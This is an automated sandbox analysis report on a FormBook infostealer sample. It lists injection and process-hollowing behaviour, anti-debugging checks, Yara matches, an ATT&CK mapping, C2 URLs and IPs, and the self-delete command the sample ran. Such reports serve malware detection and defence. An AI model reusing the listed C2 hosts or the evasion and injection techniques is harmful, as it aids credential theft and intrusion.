          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04604F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04604F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04618794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04620050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04620050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04683884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04683884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04694257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04644A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04644A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04618A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04605210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Domain query: www.borderlesstrade.info
          Source: C:\Windows\explorer.exe Domain query: www.swashbug.com
          Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe Network Connect: 185.253.212.22 80
          Source: C:\Windows\explorer.exe Domain query: www.hispekdiamond.com
          Source: C:\Windows\explorer.exe Domain query: www.bl927.com
          Source: C:\Windows\explorer.exe Domain query: www.7chd.com
          Source: C:\Windows\explorer.exe Network Connect: 52.15.160.167 80
          Source: C:\Windows\explorer.exe Network Connect: 213.171.195.105 80
          Source: C:\Windows\explorer.exe Domain query: www.zagorafinancial.com
          Source: C:\Windows\explorer.exe Network Connect: 45.142.156.44 80
          Source: C:\Windows\explorer.exe Network Connect: 162.209.114.201 80
          Source: C:\Windows\explorer.exe Domain query: www.montcoimmigrationlawyer.com
          Source: C:\Windows\explorer.exe Network Connect: 81.169.145.72 80
          Source: C:\Windows\explorer.exe Domain query: www.mojilifenoosa.com
          Source: C:\Windows\explorer.exe Domain query: www.3992199.com
          Source: C:\Windows\explorer.exe Domain query: www.fibermover.com
          Source: C:\Windows\explorer.exe Domain query: www.funnyfootballmugs.com
          Source: C:\Windows\explorer.exe Domain query: www.przyczepy.net
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Network Connect: 169.1.24.244 80
          Source: C:\Windows\explorer.exe Domain query: www.cdefenders.com
          Contains functionality to prevent local Windows debugging
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_740D1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section loaded: unknown target: C:\Users\user\Desktop\NdBLyH2h5d.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 300000
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: explorer.exe, 00000004.00000002.478596652.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progmanlock

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Techniques listed per tactic column of the matrix; a trailing number is the figure the report attaches to that technique.

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
          Execution: Native API 1; Shared Modules 1; At (Linux); At (Windows); Cron; Launchd
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
          Privilege Escalation: Process Injection 612; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
          Defense Evasion: Virtualization/Sandbox Evasion 3; Process Injection 612; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 3; Rundll32 1; Software Packing 11
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
          Discovery: Security Software Discovery 141; Virtualization/Sandbox Evasion 3; Process Discovery 2; Remote System Discovery 1; File and Directory Discovery 2; System Information Discovery 12
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
          Collection: Archive Collected Data 1; Clipboard Data 1; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
          Command and Control: Encrypted Channel 1; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 13; Fallback Channels; Multiband Communication
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
          Impact: System Shutdown/Reboot 1; Device Lockout; Delete Device Data

          Behavior Graph

          Behavior Graph ID: 385309   Sample: NdBLyH2h5d.exe   Start date: 12/04/2021   Architecture: WINDOWS   Score: 100

          Start node DNS/IP info: www.plaisterpress.com; www.missjeschickt.com; missjeschickt.com
          Start node signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures

          Process tree (each child is indented under its parent):

          • NdBLyH2h5d.exe 18 (started)
            DNS/IP info: 192.168.2.1 unknown unknown
            Dropped file: C:\Users\user\AppData\...\6oxdti6l9qd.dll, PE32
            Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging
            • NdBLyH2h5d.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              • explorer.exe (injected)
                DNS/IP info: missjeschickt.com 81.169.145.72, 49734, 80 STRATOSTRATOAGDE Germany; zagorafinancial.com 162.209.114.201, 49723, 80 RACKSPACEUS United States; 20 other IPs or domains
                Signatures: System process connects to network (likely due to code injection or exploit)
                • rundll32.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  • cmd.exe 1 (started)
                    • conhost.exe (started)

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          NdBLyH2h5d.exe | 21% | Virustotal |
          NdBLyH2h5d.exe | 8% | Metadefender |
          NdBLyH2h5d.exe | 29% | ReversingLabs | Win32.Trojan.Wacatac

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          6.2.rundll32.exe.4d44f8.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
          0.2.NdBLyH2h5d.exe.2640000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.NdBLyH2h5d.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.1.NdBLyH2h5d.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.2.rundll32.exe.4b17960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          https://www.plaisterpress.com/uoe8/?Dnh8=ntdwrTRF9WA24Nqdf4NJYZb1FUQAWBN8mHVjFMye2D4j4jK3D0IQWYm/ipt | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.fibermover.com/uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp | 100% | Avira URL Cloud | malware
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.missjeschickt.com/uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.przyczepy.net/uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.montcoimmigrationlawyer.com/uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.funnyfootballmugs.com/uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          www.montcoimmigrationlawyer.com/uoe8/ | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.mojilifenoosa.com/uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.3992199.com/uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.zagorafinancial.com/uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.swashbug.com/uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 52.15.160.167 | true | false | | high
          montcoimmigrationlawyer.com | 184.168.131.241 | true | true | | unknown
          missjeschickt.com | 81.169.145.72 | true | true | | unknown
          www.przyczepy.net | 185.253.212.22 | true | true | | unknown
          k9cdna.51w4.com | 45.142.156.44 | true | true | | unknown
          www.swashbug.com | 169.1.24.244 | true | true | | unknown
          mojilifenoosa.com | 184.168.131.241 | true | true | | unknown
          zagorafinancial.com | 162.209.114.201 | true | true | | unknown
          shops.myshopify.com | 23.227.38.74 | true | true | | unknown
          fibermover.com | 34.102.136.180 | true | false | | unknown
          www.hispekdiamond.com | 213.171.195.105 | true | true | | unknown
          www.plaisterpress.com | 104.21.24.135 | true | true | | unknown
          www.borderlesstrade.info | unknown | unknown | true | | unknown
          www.bl927.com | unknown | unknown | true | | unknown
          www.montcoimmigrationlawyer.com | unknown | unknown | true | | unknown
          www.mojilifenoosa.com | unknown | unknown | true | | unknown
          www.missjeschickt.com | unknown | unknown | true | | unknown
          www.3992199.com | unknown | unknown | true | | unknown
          www.fibermover.com | unknown | unknown | true | | unknown
          www.funnyfootballmugs.com | unknown | unknown | true | | unknown
          www.7chd.com | unknown | unknown | true | | unknown
          www.cdefenders.com | unknown | unknown | true | | unknown
          www.zagorafinancial.com | unknown | unknown | true | | unknown

                                                        Contacted URLs


                                                        URLs from Memory and Binaries


                                                                            Contacted IPs


                                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.142.156.44 | k9cdna.51w4.com | United Kingdom | 40065 | CNSERVERSUS | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
184.168.131.241 | montcoimmigrationlawyer.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
162.209.114.201 | zagorafinancial.com | United States | 27357 | RACKSPACEUS | true
185.253.212.22 | www.przyczepy.net | Poland | 48707 | GREENER-ASPL | true
